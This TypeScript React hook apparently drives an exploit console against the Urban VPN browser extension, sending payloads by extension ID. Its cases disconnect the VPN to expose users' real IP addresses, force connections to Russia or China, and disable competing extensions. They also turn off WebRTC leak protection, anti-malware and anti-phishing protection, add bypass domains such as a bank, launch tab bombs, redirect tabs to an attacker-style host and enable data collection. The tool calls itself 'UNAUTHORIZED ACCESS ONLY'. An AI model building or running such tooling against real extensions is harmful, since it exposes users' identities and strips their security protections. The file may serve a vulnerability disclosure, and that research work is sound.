import { useState, useCallback, useRef } from 'react'

import {
  exploitPayloads,
  sendExploitPayload,
  sendAsyncExploitPayload,
  type ExploitType,
  EXTENSION_ID,
} from '../utils/exploitPayloads'

export interface LogEntry {
  id: number
  timestamp: Date
  message: string
  type: 'info' | 'warning' | 'error' | 'success' | 'system'
}

export interface ExploitResult {
  success: boolean
  message: string
  data?: unknown
}

interface VPNStateResponse {
  connection: string
  location?: { code: string; provider: string }
  proxy?: { server?: { host: string; port: number } }
  duration?: number
  lastAction?: string
}

interface ExtensionInfo {
  id: string
  name: string
}

interface BypassItem {
  value: string
  scope: string
}

export const useExploitRunner = () => {
  const [logs, setLogs] = useState<LogEntry[]>([])
  const [isRunning, setIsRunning] = useState(false)
  const [lastExploit, setLastExploit] = useState<ExploitType | null>(null)
  const [lastResult, setLastResult] = useState<unknown>(null)
  const logIdRef = useRef(0)

  const addLog = useCallback(
    (message: string, type: LogEntry['type'] = 'info') => {
      const entry: LogEntry = {
        id: logIdRef.current++,
        timestamp: new Date(),
        message,
        type,
      }
      setLogs((prev) => [...prev, entry])
      return entry
    },
    []
  )

  const clearLogs = useCallback(() => {
    setLogs([])
    logIdRef.current = 0
  }, [])

  const runExploit = useCallback(
    async (
      exploitType: ExploitType,
      input?: string
    ): Promise<ExploitResult> => {
      setIsRunning(true)
      setLastExploit(exploitType)
      setLastResult(null)

      addLog(`[EXPLOIT] Executing: ${exploitType}`, 'warning')

      let result: ExploitResult = { success: false, message: '' }

      try {
        switch (exploitType) {
          case 'openTab': {
            const url = input || 'https://evil.example.com'
            addLog(`[TAB] Opening URL: ${url}`, 'info')
            const payload = exploitPayloads.openTab(url)
            sendExploitPayload(payload)
            result = { success: true, message: `Tab open payload sent for: ${url}` }
            break
          }

          case 'tabBomb': {
            const count = parseInt(input || '10', 10)
            addLog(`[TAB BOMB] Unleashing ${count} tabs over 3 seconds...`, 'error')
            exploitPayloads.tabBomb(count, 3000)
            result = { success: true, message: `Tab bomb deployed: ${count} tabs` }
            break
          }

          case 'navigateTab': {
            const url = input || 'https://evil.example.com'
            addLog(`[NAVIGATE] Redirecting to: ${url}`, 'info')
            const payload = exploitPayloads.navigateTab(url)
            sendExploitPayload(payload)
            result = { success: true, message: `Navigation payload sent` }
            break
          }

          case 'disconnectVPN': {
            addLog(`[VPN] DISCONNECTING VPN - USER IP WILL BE EXPOSED!`, 'error')
            const payload = exploitPayloads.disconnectVPN()
            sendExploitPayload(payload)
            result = { success: true, message: 'VPN disconnect payload sent!' }
            addLog(`[VPN] USER REAL IP NOW EXPOSED!`, 'error')
            break
          }

          case 'connectToRussia': {
            addLog(`[VPN] Forcing connection to RUSSIA...`, 'error')
            const payload = exploitPayloads.connectToCountry('RU')
            sendExploitPayload(payload)
            result = { success: true, message: 'Force connect to Russia sent' }
            break
          }

          case 'connectToChina': {
            addLog(`[VPN] Forcing connection to CHINA...`, 'error')
            const payload = exploitPayloads.connectToCountry('CN')
            sendExploitPayload(payload)
            result = { success: true, message: 'Force connect to China sent' }
            break
          }

          case 'getVPNState': {
            addLog(`[VPN] Retrieving VPN state...`, 'info')
            const payload = exploitPayloads.getVPNState()
            const response = await sendAsyncExploitPayload<VPNStateResponse>(payload)

            if (response) {
              const duration = response.duration ? Math.floor(response.duration / 1000) : 0
              const mins = Math.floor(duration / 60)
              const secs = duration % 60

              addLog(`[VPN] Status: ${response.connection}`, 'success')
              addLog(`[VPN] Location: ${response.location?.code || 'none'} (${response.location?.provider || ''})`, 'info')
              addLog(`[VPN] Proxy: ${response.proxy?.server?.host || 'none'}:${response.proxy?.server?.port || ''}`, 'info')
              addLog(`[VPN] Duration: ${mins}m ${secs}s`, 'info')

              setLastResult(response)
              result = { success: true, message: 'VPN state retrieved', data: response }
            } else {
              addLog(`[VPN] Failed to get state (timeout or extension not responding)`, 'error')
              result = { success: false, message: 'Failed to get VPN state' }
            }
            break
          }

          case 'disableExtensions': {
            addLog(`[EXTENSION] Disabling competing VPNs/security tools...`, 'error')
            addLog(`[EXTENSION] Targeting: NordVPN, ExpressVPN, AdGuard, uBlock...`, 'warning')
            const payload = exploitPayloads.disableExtensions()
            sendExploitPayload(payload)
            result = { success: true, message: 'Disable extensions payload sent' }
            break
          }

          case 'getExtensionList': {
            addLog(`[EXTENSION] Retrieving list of vulnerable extensions...`, 'info')
            const payload = exploitPayloads.getExtensionList()
            const response = await sendAsyncExploitPayload<ExtensionInfo[]>(payload)

            if (response && Array.isArray(response)) {
              if (response.length === 0) {
                addLog(`[EXTENSION] No other proxy extensions found`, 'info')
              } else {
                addLog(`[EXTENSION] Found ${response.length} extensions that can be disabled:`, 'success')
                response.forEach((ext) => {
                  addLog(`[EXTENSION]   - ${ext.name} (${ext.id})`, 'warning')
                })
              }
              setLastResult(response)
              result = { success: true, message: `Found ${response.length} extensions`, data: response }
            } else {
              addLog(`[EXTENSION] Failed to get list (timeout or extension not responding)`, 'error')
              result = { success: false, message: 'Failed to get extension list' }
            }
            break
          }

          case 'addBypassDomain': {
            const domain = input || 'bankofamerica.com'
            addLog(`[BYPASS] Adding to bypass list: ${domain}`, 'error')
            addLog(`[BYPASS] Traffic to ${domain} will expose real IP!`, 'warning')
            const payload = exploitPayloads.addBypassDomain(domain)
            sendExploitPayload(payload)
            result = { success: true, message: `Bypass domain added: ${domain}` }
            break
          }

          case 'getBypassList': {
            addLog(`[BYPASS] Retrieving current bypass list...`, 'info')
            const payload = exploitPayloads.getBypassList()
            const response = await sendAsyncExploitPayload<BypassItem[]>(payload)

            if (response && Array.isArray(response)) {
              const userItems = response.filter((i) => i.scope === 'user')
              addLog(`[BYPASS] Total items: ${response.length}, User-added: ${userItems.length}`, 'success')

              if (userItems.length > 0) {
                addLog(`[BYPASS] User bypass domains:`, 'info')
                userItems.forEach((item) => {
                  addLog(`[BYPASS]   - ${item.value}`, 'warning')
                })
              }

              setLastResult(response)
              result = { success: true, message: `Bypass list: ${response.length} items`, data: response }
            } else {
              addLog(`[BYPASS] Failed to get list (timeout or extension not responding)`, 'error')
              result = { success: false, message: 'Failed to get bypass list' }
            }
            break
          }

          case 'enableWebRTC': {
            addLog(`[WEBRTC] Enabling WebRTC leak protection...`, 'info')
            const payload = exploitPayloads.enableWebRTC()
            sendExploitPayload(payload)
            result = { success: true, message: 'WebRTC protection enabled' }
            break
          }

          case 'disableWebRTC': {
            addLog(`[WEBRTC] DISABLING WebRTC leak protection...`, 'error')
            addLog(`[WEBRTC] Real IP can now leak via WebRTC!`, 'warning')
            const payload = exploitPayloads.disableWebRTC()
            sendExploitPayload(payload)
            result = { success: true, message: 'WebRTC protection disabled - IP may leak!' }
            break
          }

          case 'disableAntiMalware': {
            addLog(`[SECURITY] Disabling anti-malware protection...`, 'error')
            const payload = exploitPayloads.disableAntiMalware()
            sendExploitPayload(payload)
            result = { success: true, message: 'Anti-malware disable command sent' }
            break
          }

          case 'enableAntiMalware': {
            addLog(`[SECURITY] Enabling anti-malware protection...`, 'info')
            const payload = exploitPayloads.enableAntiMalware()
            sendExploitPayload(payload)
            result = { success: true, message: 'Anti-malware enable command sent' }
            break
          }

          case 'disableAntiPhishing': {
            addLog(`[SECURITY] Disabling anti-phishing/safe browsing protection...`, 'error')
            const payload = exploitPayloads.disableAntiPhishing()
            sendExploitPayload(payload)
            result = { success: true, message: 'Anti-phishing disable command sent' }
            break
          }

          case 'enableAntiPhishing': {
            addLog(`[SECURITY] Enabling anti-phishing/safe browsing protection...`, 'info')
            const payload = exploitPayloads.enableAntiPhishing()
            sendExploitPayload(payload)
            result = { success: true, message: 'Anti-phishing enable command sent' }
            break
          }

          case 'disableAdBlocker': {
            addLog(`[SECURITY] Disabling anti-malicious ads protection...`, 'error')
            const payload = exploitPayloads.disableAdBlocker()
            sendExploitPayload(payload)
            result = { success: true, message: 'Ad blocker disable command sent' }
            break
          }

          case 'enableAdBlocker': {
            addLog(`[SECURITY] Enabling anti-malicious ads protection...`, 'info')
            const payload = exploitPayloads.enableAdBlocker()
            sendExploitPayload(payload)
            result = { success: true, message: 'Ad blocker enable command sent' }
            break
          }

          case 'disableDataCollection': {
            addLog(`[PRIVACY] Opting OUT of data collection...`, 'success')
            const payload = exploitPayloads.disableDataCollection()
            sendExploitPayload(payload)
            result = { success: true, message: 'Opted out of data collection' }
            break
          }

          case 'enableDataCollection': {
            addLog(`[PRIVACY] Opting IN to data collection...`, 'error')
            const payload = exploitPayloads.enableDataCollection()
            sendExploitPayload(payload)
            result = { success: true, message: 'Opted in to data collection' }
            break
          }

          default:
            result = { success: false, message: `Unknown exploit type: ${exploitType}` }
        }

        if (result.success) {
          addLog(`[COMPLETE] ${result.message}`, 'success')
        }
      } catch (err) {
        const errorMsg = err instanceof Error ? err.message : 'Unknown error'
        addLog(`[ERROR] ${errorMsg}`, 'error')
        result = { success: false, message: errorMsg }
      }

      setIsRunning(false)
      return result
    },
    [addLog]
  )

  const initializeLogs = useCallback(() => {
    addLog('═══════════════════════════════════════════════════════════', 'system')
    addLog('  URBAN VPN EXPLOIT TERMINAL v1.0.0', 'system')
    addLog('  UNAUTHORIZED ACCESS ONLY', 'system')
    addLog('═══════════════════════════════════════════════════════════', 'system')
    addLog('', 'system')
    addLog(`Extension ID: ${EXTENSION_ID}`, 'info')
    addLog('If Urban VPN is installed, exploits will execute on button click.', 'info')
    addLog('', 'system')
    addLog('Ready to execute exploits...', 'info')
    addLog('═══════════════════════════════════════════════════════════', 'system')
  }, [addLog])

  return {
    logs,
    isRunning,
    lastExploit,
    lastResult,
    runExploit,
    addLog,
    clearLogs,
    initializeLogs,
  }
}

export default useExploitRunner
